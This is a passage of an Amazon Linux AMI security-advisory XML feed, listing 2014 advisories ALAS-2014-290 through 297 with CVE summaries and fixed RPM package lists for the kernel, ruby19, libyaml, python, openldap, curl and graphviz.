CVE-2014-1874:
1062356:
CVE-2014-1874 Kernel: SELinux: local denial-of-service
CVE-2014-0069:
1064253:
CVE-2014-0069 kernel: cifs: incorrect handling of bogus user pointers during uncached writes
CVE-2013-7265:
The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.
1035875:
CVE-2013-7263 CVE-2013-7265 Kernel: net: leakage of uninitialized memory to user-space via recv syscalls
CVE-2013-7263:
The Linux kernel before 3.12.4 updates certain length values before ensuring that associated data structures have been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call, related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c, net/ipv6/raw.c, and net/ipv6/udp.c.
1035875:
CVE-2013-7263 CVE-2013-7265 Kernel: net: leakage of uninitialized memory to user-space via recv syscalls
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7263" title="" id="CVE-2013-7263" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7265" title="" id="CVE-2013-7265" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0069" title="" id="CVE-2014-0069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1874" title="" id="CVE-2014-1874" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.82" release="69.112.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.82-69.112.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-290</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-290: medium priority package update for ruby19</title><issued date="2014-02-26 14:27:00" /><updated date="2014-09-16 22:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4363:
Algorithmic complexity vulnerability in Gem::Version::ANCHORED_VERSION_PATTERN in lib/rubygems/version.rb in RubyGems before 1.8.23.2, 1.8.24 through 1.8.26, 2.0.x before 2.0.10, and 2.1.x before 2.1.5, as used in Ruby 1.9.0 through 2.0.0p247, allows remote attackers to cause a denial of service (CPU consumption) via a crafted gem version that triggers a large amount of backtracking in a regular expression. NOTE: this issue is due to an incomplete fix for CVE-2013-4287.
1009720:
CVE-2013-4363 rubygems: version regex algorithmic complexity vulnerability, incomplete CVE-2013-4287 fix
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4363" title="" id="CVE-2013-4363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem19-bigdecimal" version="1.1.0" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.60.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-devel" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.60.amzn1.noarch.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.60.amzn1.noarch.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-irb" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.545-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-291</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-291: important priority package update for libyaml</title><issued date="2014-02-26 14:27:00" /><updated date="2014-09-16 22:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6393:
The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0.1.5 performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted tags in a YAML document, which triggers a heap-based buffer overflow.
1033990:
CVE-2013-6393 libyaml: heap-based buffer overflow when parsing YAML tags
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6393" title="" id="CVE-2013-6393" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libyaml-debuginfo" version="0.1.4" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-debuginfo-0.1.4-6.5.amzn1.x86_64.rpm</filename></package><package name="libyaml" version="0.1.4" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-0.1.4-6.5.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.4" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-devel-0.1.4-6.5.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.4" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-devel-0.1.4-6.5.amzn1.i686.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.4" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-debuginfo-0.1.4-6.5.amzn1.i686.rpm</filename></package><package name="libyaml" version="0.1.4" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-0.1.4-6.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-292</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-292: medium priority package update for python26</title><issued date="2014-02-26 14:28:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1912:
1062370:
CVE-2014-1912 python: buffer overflow in socket.recvfrom_into()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1912" title="" id="CVE-2014-1912" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-devel" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-293</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-293: medium priority package update for python27</title><issued date="2014-02-26 14:28:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1912:
1062370:
CVE-2014-1912 python: buffer overflow in socket.recvfrom_into()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1912" title="" id="CVE-2014-1912" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tools" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.5-11.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-294</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-294: medium priority package update for openldap</title><issued date="2014-02-26 16:22:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4449:
The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier does not properly count references, which allows remote attackers to cause a denial of service (slapd crash) by unbinding immediately after a search request, which triggers rwm_conn_destroy to free the session context while it is being used by rwm_op_search.
1019490:
CVE-2013-4449 openldap: segfault on certain queries with rwm overlay
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4449" title="" id="CVE-2013-4449" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-servers" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-34.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-295</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-295: medium priority package update for curl</title><issued date="2014-02-26 16:51:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0015:
cURL and libcurl 7.10.6 through 7.34.0, when more than one authentication method is enabled, re-uses NTLM connections, which might allow context-dependent attackers to authenticate as other users via a request.
1053903:
CVE-2014-0015 curl: re-use of wrong HTTP NTLM connection in libcurl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0015" title="" id="CVE-2014-0015" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.35.0-2.42.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.35.0-2.42.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.35.0-2.42.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.35.0-2.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-296</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-296: medium priority package update for graphviz</title><issued date="2014-03-06 14:55:00" /><updated date="2014-09-16 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1236:
Stack-based buffer overflow in the chkNum function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via vectors related to a "badly formed number" and a "long digit list."
1050872:
CVE-2014-1236 graphviz: buffer overflow vulnerability
CVE-2014-1235:
1050871:
CVE-2014-1235 graphviz: buffer overflow in yyerror() due to improper fix for CVE-2014-0978
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1235" title="" id="CVE-2014-1235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1236" title="" id="CVE-2014-1236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-guile" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.30.1-12.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-297</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-297: medium priority package update for graphviz-php</title><issued date="2014-03-06 14:55:00" /><updated date="2014-09-16 22:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1236:
Stack-based buffer overflow in the chkNum function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via vectors related to a "badly formed number" and a "long digit list."
1050872:
CVE-2014-1236 graphviz: buffer overflow vulnerability
CVE-2014-1235:
1050871:
CVE-2014-1235 graphviz: buffer overflow in yyerror() due to improper fix for CVE-2014-0978
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
